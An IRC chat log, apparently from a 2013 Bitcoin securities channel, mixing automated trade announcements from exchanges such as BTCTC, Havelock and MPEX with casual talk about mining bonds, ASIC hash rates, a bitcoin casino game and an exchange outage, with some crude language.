@ 0.04429999 = 0.443 BTC [+] Jul 23 06:28:43 [MPEX] [S.MPOE] 5000 @ 0.00080772 = 4.0386 BTC [-] Jul 23 06:29:10 [HAVELOCK] [AM100] 12 @ 0.04429999 = 0.5316 BTC [+] Jul 23 06:29:17 [HAVELOCK] [AM100] 1 @ 0.04429999 BTC [+] Jul 23 06:29:24 [HAVELOCK] [AM100] 1 @ 0.04429999 BTC [+] Jul 23 06:34:29 [BTCTC] [TAT.ASICMINER] 5 @ 0.045967 = 0.2298 BTC [-] Jul 23 06:40:10 dub i don't know if there;s something more banal out there. Jul 23 06:40:23 anais nin put it better, and anais nin was basically a cocksuckiong groupie. Jul 23 06:40:36 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00343 BTC [-] Jul 23 06:43:10 https://twitter.com/The_Strangerer/status/359406861709111296/photo/1 Jul 23 06:43:12 Twitter / The_Strangerer: BREAKING NEWS, ZOMBIE HOARD ... Jul 23 06:43:35 [BTCTC] [ASICMINER-PT] 2 @ 4.700001 = 9.4 BTC [+] Jul 23 06:43:37 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 23 06:43:40 [BTCTC] [ASICMINER-PT] 4 @ 4.7 = 18.8 BTC [-] Jul 23 06:43:42 [BTCTC] [ASICMINER-PT] 1 @ 4.690001 BTC [-] Jul 23 06:43:44 [BTCTC] [ASICMINER-PT] 1 @ 4.69 BTC [-] Jul 23 06:43:47 [BTCTC] [ASICMINER-PT] 1 @ 4.689 BTC [-] Jul 23 06:43:50 [BTCTC] [ASICMINER-PT] 2 @ 4.685001 = 9.37 BTC [-] Jul 23 06:43:52 [BTCTC] [ASICMINER-PT] 3 @ 4.685 = 14.055 BTC [-] Jul 23 06:44:27 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003449 = 0.0345 BTC [+] Jul 23 06:44:42 [HAVELOCK] [SMG] 727 @ 0.0002711 = 0.1971 BTC [-] Jul 23 06:44:45 [HAVELOCK] [SMG] 5000 @ 0.00027 = 1.35 BTC [-] Jul 23 06:45:15 [HAVELOCK] [SMG] 4691 @ 0.000269 = 1.2619 BTC [-] Jul 23 06:45:44 [BTCTC] [AMC-PT] 92 @ 0.004019 = 0.3697 BTC [-] Jul 23 06:47:11 COG.F2? Jul 23 06:47:15 https://btct.co/security/COG.F2 Jul 23 06:47:21 what the world needs now Jul 23 06:47:24 BTC-TC: BTC Trading Corp - View Security Jul 23 06:51:17 Initially, COG.F contracts will be sold for 10 btc each. This price is hugely advantagous for new and old investors alike, because it will allow us to obtain more hardware without diluding current shareholders' dividends. Jul 23 06:51:20 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [+] Jul 23 06:51:21 deluding ? Jul 23 06:51:45 lol Jul 23 06:51:48 dude is 9 years old man, give him a break Jul 23 06:51:49 As soon as enough coins are raised and the opportunity becomes available (Whether it be Avlalon, BitFury, BFL, or other) we will make a purchase. Jul 23 06:51:49 Coins will be stored in a secure and redundant environment, ensuring the security of our bitcoins. Jul 23 06:51:56 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [+] Jul 23 06:51:57 pretty cool. Jul 23 06:52:03 Lol hahah Jul 23 06:52:10 he rights con-trakts as he thinks Jul 23 06:52:15 deluding Jul 23 06:52:19 is this the guy with the shill bidding ? Jul 23 06:52:23 yeha Jul 23 06:52:32 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [+] Jul 23 06:52:33 right-o. Jul 23 06:52:47 hahah http://forums.drpennystock.com/technical-analysis/hi-guys-what-does-dilude-mean/ Jul 23 06:53:14 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [+] Jul 23 06:53:56 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [+] Jul 23 06:54:08 perhaps diludes are like qualudes Jul 23 06:54:49 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [+] Jul 23 06:55:11 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [+] Jul 23 06:55:54 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [+] Jul 23 06:56:35 lmao Jul 23 06:56:51 [HAVELOCK] [AM100] 10 @ 0.04429999 = 0.443 BTC [+] Jul 23 06:57:00 [HAVELOCK] [AM100] 10 @ 0.04429999 = 0.443 BTC [+] Jul 23 06:57:11 [HAVELOCK] [AM100] 3 @ 0.04429999 = 0.1329 BTC [+] Jul 23 06:57:22 [HAVELOCK] [AM100] 1 @ 0.04429999 BTC [+] Jul 23 06:57:26 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [+] Jul 23 06:58:06 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [+] Jul 23 06:58:40 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [+] Jul 23 06:58:58 [BTCTC] [DMS.MINING] 18 @ 0.0143 = 0.2574 BTC [-] Jul 23 06:59:26 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [+] Jul 23 06:59:36 [BTCTC] [DMS.MINING] 18 @ 0.014 = 0.252 BTC [-] Jul 23 06:59:38 [BTCTC] [DMS.MINING] 44 @ 0.01399 = 0.6156 BTC [-] Jul 23 06:59:39 [BTCTC] [DMS.MINING] 2 @ 0.013919 = 0.0278 BTC [-] Jul 23 06:59:41 [BTCTC] [DMS.MINING] 1 @ 0.01391 BTC [-] Jul 23 06:59:41 [BTCTC] [DMS.MINING] 35 @ 0.01391 = 0.4869 BTC [-] Jul 23 06:59:56 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [+] Jul 23 07:00:44 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [+] Jul 23 07:01:00 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003698 BTC [+] Jul 23 07:01:04 [BTCTC] [DMS.SELLING] 75 @ 0.025689 = 1.9267 BTC [+] Jul 23 07:01:28 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003641 = 0.0364 BTC [-] Jul 23 07:01:49 [BTCTC] [RSM] 71 @ 0.01681 = 1.1935 BTC [+] Jul 23 07:02:46 [BTCTC] [DMS.SELLING] 50 @ 0.025689 = 1.2845 BTC [+] Jul 23 07:04:31 [BTCTC] [BASIC-MINING] 2 @ 0.592044 = 1.1841 BTC [-] Jul 23 07:04:39 [BTCTC] [TAT.ASICMINER] 33 @ 0.045955 = 1.5165 BTC [-] Jul 23 07:04:58 [BTCTC] [DMS.SELLING] 40 @ 0.025689 = 1.0276 BTC [+] Jul 23 07:10:00 [BTCTC] [AMC-PT] 33 @ 0.003901 = 0.1287 BTC [-] Jul 23 07:13:58 [BTCTC] [LTC-ATF.B2] 5 @ 0.010289 = 0.0514 BTC [+] Jul 23 07:14:30 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003551 = 0.0355 BTC [-] Jul 23 07:14:58 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003551 = 0.0355 BTC [-] Jul 23 07:15:01 [BTCTC] [TAT.ASICMINER] 11 @ 0.045545 = 0.501 BTC [-] Jul 23 07:18:12 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00355 BTC [-] Jul 23 07:23:13 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003439 = 0.0344 BTC [-] Jul 23 07:23:43 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003439 = 0.0344 BTC [-] Jul 23 07:24:14 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003439 = 0.0069 BTC [-] Jul 23 07:25:54 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003551 = 0.0355 BTC [+] Jul 23 07:26:29 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003551 = 0.0355 BTC [+] Jul 23 07:27:53 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.00356 = 1.78 BTC [+] Jul 23 07:29:45 [BTCTC] [AMC-PT] 1 @ 0.003991 BTC [+] Jul 23 07:32:07 [HAVELOCK] [AM100] 2 @ 0.04429999 = 0.0886 BTC [+] Jul 23 07:32:10 [BTCTC] [TAT.ASICMINER] 4 @ 0.045945 = 0.1838 BTC [+] Jul 23 07:33:49 [BTCTC] [TAT.ASICMINER] 22 @ 0.045946 = 1.0108 BTC [+] Jul 23 07:36:48 [BTCTC] [ASICMINER-PT] 1 @ 4.719999 BTC [+] Jul 23 07:36:50 [BTCTC] [ASICMINER-PT] 2 @ 4.72 = 9.44 BTC [+] Jul 23 07:36:52 [BTCTC] [ASICMINER-PT] 1 @ 4.735 BTC [+] Jul 23 07:36:54 [BTCTC] [ASICMINER-PT] 4 @ 4.739979 = 18.9599 BTC [+] Jul 23 07:36:56 [BTCTC] [ASICMINER-PT] 5 @ 4.73998 = 23.6999 BTC [+] Jul 23 07:38:50 [MPEX] [S.MPOE] 1151 @ 0.00080771 = 0.9297 BTC [-] Jul 23 07:39:38 [BTCTC] [AMC-PT] 105 @ 0.003991 = 0.4191 BTC [+] Jul 23 07:40:35 [MPEX] [S.BBET] 763 @ 0.00099999 = 0.763 BTC [-] Jul 23 07:44:22 [HAVELOCK] [SDSTM] 2 @ 0.01095 = 0.0219 BTC [-] Jul 23 07:44:56 [HAVELOCK] [SDSTM] 4 @ 0.0109 = 0.0436 BTC [-] Jul 23 07:45:08 [BTCTC] [ASICMINER-PT] 1 @ 4.705 BTC [-] Jul 23 07:45:10 [BTCTC] [ASICMINER-PT] 1 @ 4.700003 BTC [-] Jul 23 07:45:12 [BTCTC] [ASICMINER-PT] 3 @ 4.700002 = 14.1 BTC [-] Jul 23 07:46:52 [BTCTC] [ASICMINER-PT] 1 @ 4.741 BTC [+] Jul 23 07:46:54 [BTCTC] [ASICMINER-PT] 1 @ 4.741229 BTC [+] Jul 23 07:49:12 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003439 = 0.0344 BTC [-] Jul 23 07:49:24 [BTCTC] [COGNITIVE] 1 @ 0.780001 BTC [-] Jul 23 07:49:34 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003439 = 0.0344 BTC [-] Jul 23 07:50:19 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003439 = 0.0344 BTC [-] Jul 23 07:50:53 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003431 BTC [-] Jul 23 07:50:54 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00344 BTC [+] Jul 23 07:52:41 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003435 = 0.0344 BTC [-] Jul 23 07:53:02 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003435 = 0.0344 BTC [-] Jul 23 07:53:19 [BTCTC] [RSM] 18 @ 0.01681 = 0.3026 BTC [+] Jul 23 07:53:34 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003435 = 0.0344 BTC [-] Jul 23 07:53:36 [MPEX] [S.MPOE] 1454 @ 0.00080771 = 1.1744 BTC [-] Jul 23 07:53:38 [MPEX] [S.MPOE] 262 @ 0.00080772 = 0.2116 BTC [+] Jul 23 07:53:50 [HAVELOCK] [AM100] 1 @ 0.04390001 BTC [-] Jul 23 07:53:53 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003435 = 0.0344 BTC [-] Jul 23 07:54:11 [BTCTC] [TAT.ASICMINER] 28 @ 0.045505 = 1.2741 BTC [-] Jul 23 07:54:12 [BTCTC] [TAT.ASICMINER] 50 @ 0.045504 = 2.2752 BTC [-] Jul 23 07:54:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.0455 = 0.091 BTC [-] Jul 23 07:54:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.0455 = 0.2275 BTC [-] Jul 23 07:54:18 [BTCTC] [TAT.ASICMINER] 21 @ 0.045395 = 0.9533 BTC [-] Jul 23 07:54:20 [BTCTC] [TAT.ASICMINER] 6 @ 0.045394 = 0.2724 BTC [-] Jul 23 07:54:29 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003435 = 0.0344 BTC [-] Jul 23 07:54:32 [BTCTC] [TAT.ASICMINER] 36 @ 0.04539 = 1.634 BTC [-] Jul 23 07:54:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.045301 = 0.0906 BTC [-] Jul 23 07:54:37 [BTCTC] [TAT.ASICMINER] 5 @ 0.0453 = 0.2265 BTC [-] Jul 23 07:54:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.045187 BTC [-] Jul 23 07:54:42 [BTCTC] [TAT.ASICMINER] 10 @ 0.045101 = 0.451 BTC [-] Jul 23 07:54:43 [BTCTC] [TAT.ASICMINER] 8 @ 0.0451 = 0.3608 BTC [-] Jul 23 07:55:07 [BTCTC] [DMS.SELLING] 113 @ 0.02545 = 2.8759 BTC [-] Jul 23 07:55:23 [BTCTC] [DMS.SELLING] 435 @ 0.025689 = 11.1747 BTC [+] Jul 23 07:55:34 [BTCTC] [DMS.SELLING] 191 @ 0.025738 = 4.916 BTC [+] Jul 23 07:56:03 [BTCTC] [ASICMINER-PT] 1 @ 4.740999 BTC [-] Jul 23 08:01:02 [BTCTC] [ASICMINER-PT] 1 @ 4.737999 BTC [-] Jul 23 08:01:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.045898 = 0.459 BTC [+] Jul 23 08:02:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.045898 = 0.2295 BTC [+] Jul 23 08:02:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.045898 = 0.2295 BTC [+] Jul 23 08:02:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.045898 BTC [+] Jul 23 08:08:57 [BTCTC] [DMS.PURCHASE] 217 @ 0.039422 = 8.5546 BTC [+] Jul 23 08:17:50 [BTCTC] [AMC-PT] 143 @ 0.00392 = 0.5606 BTC [-] Jul 23 08:18:42 [HAVELOCK] [AM100] 1 @ 0.04429999 BTC [+] Jul 23 08:18:52 [HAVELOCK] [AM100] 1 @ 0.04429999 BTC [+] Jul 23 08:19:02 [HAVELOCK] [AM100] 1 @ 0.04429999 BTC [+] Jul 23 08:19:41 [BTCTC] [DMS.SELLING] 20 @ 0.025738 = 0.5148 BTC [+] Jul 23 08:19:43 [BTCTC] [DMS.SELLING] 31 @ 0.025744 = 0.7981 BTC [+] Jul 23 08:19:44 [BTCTC] [DMS.SELLING] 89 @ 0.0258 = 2.2962 BTC [+] Jul 23 08:20:53 [HAVELOCK] [SMG] 1 @ 0.00027 BTC [+] Jul 23 08:25:48 [BTCTC] [AMC-PT] 160 @ 0.003977 = 0.6363 BTC [+] Jul 23 08:26:18 [BTCTC] [AMC-PT] 2 @ 0.003977 = 0.008 BTC [+] Jul 23 08:27:45 [BTCTC] [AMC-PT] 20 @ 0.003976 = 0.0795 BTC [-] Jul 23 08:33:55 [BTCTC] [DMS.MINING] 15 @ 0.01391 = 0.2087 BTC [-] Jul 23 08:33:57 [BTCTC] [DMS.MINING] 2 @ 0.013903 = 0.0278 BTC [-] Jul 23 08:33:59 [BTCTC] [DMS.MINING] 60 @ 0.013902 = 0.8341 BTC [-] Jul 23 08:34:01 [BTCTC] [DMS.MINING] 10 @ 0.013901 = 0.139 BTC [-] Jul 23 08:34:02 [BTCTC] [DMS.MINING] 19 @ 0.0139 = 0.2641 BTC [-] Jul 23 08:34:04 [BTCTC] [DMS.MINING] 35 @ 0.013821 = 0.4837 BTC [-] Jul 23 08:34:05 [BTCTC] [DMS.MINING] 10 @ 0.013821 = 0.1382 BTC [-] Jul 23 08:34:07 [BTCTC] [DMS.MINING] 10 @ 0.013821 = 0.1382 BTC [-] Jul 23 08:34:08 [BTCTC] [DMS.MINING] 2 @ 0.01355 = 0.0271 BTC [-] Jul 23 08:34:10 [BTCTC] [DMS.MINING] 2 @ 0.013521 = 0.027 BTC [-] Jul 23 08:34:11 [BTCTC] [DMS.MINING] 8 @ 0.013521 = 0.1082 BTC [-] Jul 23 08:34:13 [BTCTC] [DMS.MINING] 21 @ 0.013521 = 0.2839 BTC [-] Jul 23 08:34:13 [BTCTC] [DMS.MINING] 4 @ 0.0135 = 0.054 BTC [-] Jul 23 08:34:15 [BTCTC] [DMS.MINING] 30 @ 0.0135 = 0.405 BTC [-] Jul 23 08:34:16 [BTCTC] [DMS.MINING] 36 @ 0.0135 = 0.486 BTC [-] Jul 23 08:58:03 in defense of MPOE-PR https://bitcointalk.org/index.php?topic=260681.msg2785003#msg2785003 Jul 23 08:58:17 wow Jul 23 09:03:25 Nice Jul 23 09:05:40 Maybe they should make an MMO casino Jul 23 09:05:47 with bitcoins, of course.. Jul 23 09:06:01 Though there are certainly enough casinos out there now Jul 23 09:16:03 [HAVELOCK] [SDSTM] 4 @ 0.0109 = 0.0436 BTC [-] Jul 23 09:36:29 o hey. Jul 23 09:36:44 parseval wasn't there a team fortress one ? Jul 23 09:37:19 I dunno.. there was a minecraft one, I know that, and then there's Dragon's Tale Jul 23 09:37:44 a that that Jul 23 09:37:54 dragon tale wasnt doing too well for some reason. Jul 23 09:38:09 Both could stand some improvements.. Jul 23 09:38:18 "I would purchase some shares, but a quick look into the owner of S.MG (Mircea Popescu) shows he is insane, arrogant, a scammer, and an asshole." Jul 23 09:38:20 I won 150 btc at Dragon Tale last week Jul 23 09:38:22 hey... Jul 23 09:38:34 Then gave it to S.Dice Jul 23 09:38:36 parseval that's pretty good. what were you playing ? Jul 23 09:38:38 lol Jul 23 09:38:57 lol, yeah.. I was playing the wells and the cows Jul 23 09:39:20 [MPEX] [S.MPOE] 5600 @ 0.0008098 = 4.5349 BTC [+] Jul 23 09:39:20 can someone actually be arrogant, a scammer, insane and an asshole at the same time ? Jul 23 09:39:31 aren't these sorta mutually exclusive, if you're insane you can't really be an asshole etc ? Jul 23 09:40:05 lol Jul 23 09:40:11 imagine if he took more than a quick look! Jul 23 09:40:26 i wonder whose sock it is. Jul 23 09:40:47 [MPEX] [S.MPOE] 11489 @ 0.00080798 = 9.2829 BTC [-] Jul 23 09:41:19 parseval about a year or so ago when i played it i martingaled the palms into something ridiculous Jul 23 09:41:23 i think 1-200 btc Jul 23 09:41:45 Wow, I don't touch the trees, they're always cursed for me Jul 23 09:42:01 i don't mean the coconut ones Jul 23 09:42:08 i meanm the falling leaves i think it was Jul 23 09:42:15 Right, the leaves... treefalls I think Jul 23 09:42:18 ya Jul 23 09:42:43 It's an interesting game but it could be so much better than it is Jul 23 09:43:15 yeah. Jul 23 09:43:25 There's no web integration, and nothing to do once a player cashes out.. Interface is very dated Jul 23 09:44:06 well i mean... what'd you do once you cash out Jul 23 09:45:10 Well, you leave.. There's no sticky factor. Think free drinks or a buffet at a real casino Jul 23 09:45:31 Give people something that's not an expense to do, they'll stick around longer Jul 23 09:45:39 and they'll spend more Jul 23 09:46:11 what do these Avalon chips hash at per chip? Jul 23 09:48:11 282 MH/s according to thegenesisblock article Jul 23 09:48:43 thx Jul 23 09:48:52 260 chips per tray Jul 23 09:48:57 ThickAsThieves the chip itself is largely irrelevant tho Jul 23 09:49:03 it's the pmb+chips assemblage Jul 23 09:49:21 you could have 5000 chips at 10mh/s or 50 at 1gh/s same thing in the end Jul 23 10:01:00 I was trying to get a cost per GHs Jul 23 10:03:28 according to burnin his board runs with 450 mh/s / chip stable Jul 23 10:03:46 [BTCTC] [ASICMINER-PT] 2 @ 0.5 = 1 BTC [-] Jul 23 10:10:40 2 @ 0.5? Nice option Jul 23 10:18:58 probly paid 4btc premium on that Jul 23 10:22:31 [HAVELOCK] [AM100] 7 @ 0.04429999 = 0.3101 BTC [+] Jul 23 10:26:22 Is btct down? Jul 23 10:26:57 not here Jul 23 10:27:52 I'm showing not a single trade in an hr, and I can't remember place any sells. Jul 23 10:32:33 ;;bcstats Jul 23 10:32:35 Current Blocks: 248053 | Current Difficulty: 3.125696072776893E7 | Next Difficulty At Block: 249983 | Next Difficulty In: 1930 blocks | Next Difficulty In About: 1 week, 5 days, 8 hours, 55 minutes, and 23 seconds | Next Difficulty Estimate: 33183281.5404 | Estimated Percent Change: 6.16285 Jul 23 10:37:40 ;;nethash Jul 23 10:37:41 242288.276064 Jul 23 10:39:06 TAT Jul 23 10:39:14 yes Jul 23 10:39:16 a question on your TAT.VIRTUALMINE Jul 23 10:39:20 if you have a second Jul 23 10:39:49 as it looks, BFL asic miners started shipping out and producing Jul 23 10:39:54 given your speculation Jul 23 10:40:04 [HAVELOCK] [AM100] 22 @ 0.04429999 = 0.9746 BTC [+] Jul 23 10:40:13 do you have any plans on updating the hash rate of your bonds? Jul 23 10:40:27 [HAVELOCK] [HIM] 3 @ 0.253 = 0.759 BTC [-] Jul 23 10:41:24 [HAVELOCK] [AM100] 20 @ 0.0443 = 0.886 BTC [+] Jul 23 10:42:36 [HAVELOCK] [AM100] 18 @ 0.04429999 = 0.7974 BTC [-] Jul 23 10:42:43 [HAVELOCK] [SDSTM] 21 @ 0.011 = 0.231 BTC [+] Jul 23 10:43:02 [HAVELOCK] [AM100] 2 @ 0.0443 = 0.0886 BTC [+] Jul 23 10:43:04 Hello, looking for like a guide/faq/investopedia page that relates to all this bitcoin assets/securities stuff Jul 23 10:44:13 VanCleef, theres a guide in the deadmines that one of the pirates on the ship at the end drops Jul 23 10:46:11 Your best bet would be to search the forums or r/bitcoinstocks for a guide, VanCleef Jul 23 10:46:37 doing so :) Jul 23 10:47:15 sorry i'm in a skype cal elchespirito Jul 23 10:47:18 sometimes i wonder where some of these terms come from, or how asset operators come up with their prospectus Jul 23 10:47:22 hold on Jul 23 10:47:35 ok TAT Jul 23 10:47:58 they usually pull it out of their ass Jul 23 10:48:38 haha yeah, but i guess alot of this is exactly just like non crypto markets/investing and that's why alot of those terms are used in the bitcoin world? Jul 23 10:48:54 yes Jul 23 10:49:05 first, since when is BFL shipping with any mentionable amounts Jul 23 10:49:16 okey so i can just start reading something like this - http://www.investopedia.com/investing/investing-basics/ Jul 23 10:49:28 two weeks Jul 23 10:49:33 j/k Jul 23 10:49:42 vancleef you can pm me with some specific questions and ill try to answer them Jul 23 10:49:57 ahh thanks dance4x, appreciate it Jul 23 10:50:09 They sent out an email to their customers stating that they were shipping Jul 23 10:50:37 much to my dismay, they aren't shipping my order.. I'll probably not get mine until next year at this rate Jul 23 10:51:20 elchespirito did you read the description for TAT.VM? Jul 23 10:52:23 http://us6.campaign-archive1.com/?u=5015fc3486176144c53751877&id=892b2b70d5&e=04f01d2331 Jul 23 10:52:26 Butterfly Labs | Shipping & Customer Service Jul 23 10:52:32 ThickAsThieves: yes, but pardon my ignorance if I did not understand something clearly enough and I'm asking a question that has been answered already Jul 23 10:53:00 I just want to make sure you read the whole thing Jul 23 10:53:11 because generally the question is answered Jul 23 10:53:18 the only relevant part of that email is 'all three product lines have entered into large-scale production ' Jul 23 10:53:20 TAT.VM is not a fund Jul 23 10:55:50 elchespirito: Each 1 share of TAT.VIRTUALMINE represents the equivalent of 1MH/s of hashing ability at current mining difficulty at the time period for which each dividend is paid. -- this is fixed Jul 23 11:04:47 I said it was a bond Jul 23 11:04:53 I didn't say it was a fund Jul 23 11:05:07 and dexX7 yea, that is very, very clear Jul 23 11:05:11 1mhs Jul 23 11:05:24 for every 1 bond Jul 23 11:05:28 coupon Jul 23 11:05:35 now the question remains Jul 23 11:06:27 TAT, the difficulty is growing and with the asics being added to the net hashrate Jul 23 11:06:39 your question was "does tat adjust the hashrate/share?", wasn't it? Jul 23 11:06:48 no Jul 23 11:06:56 my question was if he was "planning to" Jul 23 11:07:00 adjust the hashrate Jul 23 11:07:38 i see.. well. afaik: nope. Jul 23 11:09:05 yea, well that's a dissapointing statement for shareholders Jul 23 11:37:45 Want: http://shop.adapteva.com/collections/parallella/products/parallella-cluster-kit Jul 23 11:38:15 I wonder how those would mine.. Jul 23 11:48:36 [HAVELOCK] [AM100] 108 @ 0.0443 = 4.7844 BTC [+] Jul 23 12:10:03 [HAVELOCK] [AM100] 13 @ 0.04390001 = 0.5707 BTC [-] Jul 23 12:11:24 [HAVELOCK] [AM100] 51 @ 0.0431201 = 2.1991 BTC [-] Jul 23 12:11:38 [HAVELOCK] [AM100] 71 @ 0.04312 = 3.0615 BTC [-] Jul 23 12:46:15 VanCleef http://trilema.com/category/bitcoin/ Jul 23 12:46:23 prolly also http://trilema.com/category/mpex/ Jul 23 12:46:36 thanks mircea Jul 23 12:46:52 dance4x who are you exactly ? Jul 23 12:46:58 reading now Jul 23 12:47:49 what do you mean Jul 23 12:48:11 i mean you're offering to answer people's questions but i've never seen you before. what makes you think you have a clue, and more generally who are you. Jul 23 12:48:28 nice cigar Jul 23 12:48:41 or trumpet Jul 23 12:49:15 im not trying to answer any serious questions. was just trying to point this guy in the right direction. Jul 23 12:52:06 its all good mircea, we had a good chat and he was pretty useful Jul 23 12:52:40 helpful i mean Jul 23 12:53:41 [HAVELOCK] [SMG] 1000 @ 0.00026999 = 0.27 BTC [-] Jul 23 12:57:49 damn @ vultures story Jul 23 13:01:21 :p Jul 23 13:02:52 btct down? Jul 23 13:03:01 i see last trade 4 hours ago Jul 23 13:03:16 [HAVELOCK] [SMG] 4 @ 0.00026 = 0.001 BTC [-] Jul 23 13:04:15 whut Jul 23 13:04:42 the realtime box has't updated as well 4 hours Jul 23 13:04:54 it's down Jul 23 13:05:36 https://bitcointalk.org/index.php?topic=261023.0 Jul 23 13:05:39 hmm Jul 23 13:05:44 btct Transaction errors Jul 23 13:05:52 might be the change over to the even numbers thing? Jul 23 13:06:20 "Same here. Related to the 4 significant digits change no doubt. Jul 23 13:06:20 No wonder the AMC-PT price has stabilised overnight." Jul 23 13:07:31 lol Jul 23 13:09:45 [MPEX] [S.MPOE] 2100 @ 0.0008098 = 1.7006 BTC [+] Jul 23 13:13:08 btct is broken Jul 23 13:13:13 "invalid bid/ask" Jul 23 13:13:18 for some hours now.. Jul 23 13:15:48 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003721 BTC [+] Jul 23 13:20:29 Chaang-Noi: I have driven one Jul 23 13:20:52 shitty SUV would not buy Jul 23 13:21:14 do you expect something like that to drive like a sports car? lol Jul 23 13:22:27 I like this http://www.landrover.com/gb/en/lr/range-rover-evoque/ Jul 23 13:22:31 inb4 im a faggot Jul 23 13:23:08 aren't those family cars? Jul 23 13:24:52 what have they done... Jul 23 13:28:19 all these "sports-like" suvs have very little headroom in the back Jul 23 13:31:18 I hope you live in a decent neighborhood Jul 23 13:35:06 [HAVELOCK] [SMG] 13 @ 0.00026 = 0.0034 BTC [-] Jul 23 13:35:31 [HAVELOCK] [SMG] 1 @ 0.00026999 BTC [+] Jul 23 13:36:35 [HAVELOCK] [SMG] 3 @ 0.00026999 = 0.0008 BTC [+] Jul 23 13:36:53 dont know.. are you in bangkok? then you're fine Jul 23 13:37:00 bubble still going strong Jul 23 13:37:24 [HAVELOCK] [SMG] 3 @ 0.00026999 = 0.0008 BTC [+] Jul 23 13:42:01 naah the housing bubble Jul 23 13:42:52 in thailand Jul 23 13:46:43 :'( but it's pretty Jul 23 13:49:56 anyone interested? 10x basic-mining via internal transfer for 190 litecoin Jul 23 13:51:05 :) Jul 23 14:01:01 cant trade AM on btctcctct Jul 23 14:01:06 its borked Jul 23 14:01:19 try havelock instead Jul 23 14:01:41 that's also good Jul 23 14:02:00 does burnside know? Jul 23 14:02:55 only MPOE-PR has PMS Jul 23 14:09:26 Yeah, try havelock. I'm testing out their websocket and need more data ;) Jul 23 14:10:06 parseval: is there any way to recover historical trade data via havelock's api? Jul 23 14:10:47 Nope, but you can pull it in JSON format off my website Jul 23 14:10:55 It goes back a few months Jul 23 14:11:26 oh really? that's great Jul 23 14:12:09 http://coinflow.co/json/HAVELOCK/AM100 Jul 23 14:12:20 [MPEX] [S.MPOE] 3550 @ 0.0008098 = 2.8748 BTC [+] Jul 23 14:12:28 just replace the AM100 with the ticker name Jul 23 14:12:58 Dates are unfortunately in javascript format, so /1000 for a unix timestamp Jul 23 14:13:26 thank you _very much! :) Jul 23 14:15:02 Sure thing Jul 23 14:22:54 [HAVELOCK] [SMG] 1246 @ 0.00026999 = 0.3364 BTC [+] Jul 23 14:22:57 [HAVELOCK] [SMG] 1000 @ 0.00026999 = 0.27 BTC [+] Jul 23 14:22:59 [HAVELOCK] [SMG] 6772 @ 0.00027 = 1.8284 BTC [+] Jul 23 14:23:01 [HAVELOCK] [SMG] 2251 @ 0.0002798 = 0.6298 BTC [+] Jul 23 14:23:03 [HAVELOCK] [SMG] 3000 @ 0.0002799 = 0.8397 BTC [+] Jul 23 14:23:05 [HAVELOCK] [SMG] 1000 @ 0.00027999 = 0.28 BTC [+] Jul 23 14:23:08 [HAVELOCK] [SMG] 6195 @ 0.00028 = 1.7346 BTC [+] Jul 23 14:23:10 [HAVELOCK] [SMG] 3536 @ 0.0002825 = 0.9989 BTC [+] Jul 23 14:26:02 [HAVELOCK] [SMG] 588 @ 0.0002825 = 0.1661 BTC [+] Jul 23 14:26:29 [HAVELOCK] [SDSTM] 1 @ 0.011 BTC [+] Jul 23 14:27:03 [HAVELOCK] [SDSTM] 12 @ 0.011 = 0.132 BTC [+] Jul 23 14:27:19 [HAVELOCK] [AM100] 2 @ 0.04428899 = 0.0886 BTC [+] Jul 23 14:28:27 So what's the deal with btct? Jul 23 14:28:57 [HAVELOCK] [SMG] 33 @ 0.0002825 = 0.0093 BTC [+] Jul 23 14:29:28 maybe it finally got sold. Jul 23 14:31:12 btct is still broken.. litecoinglobal seems to work though Jul 23 14:40:20 Bah Jul 23 14:58:48 hey Jul 23 14:59:04 lom 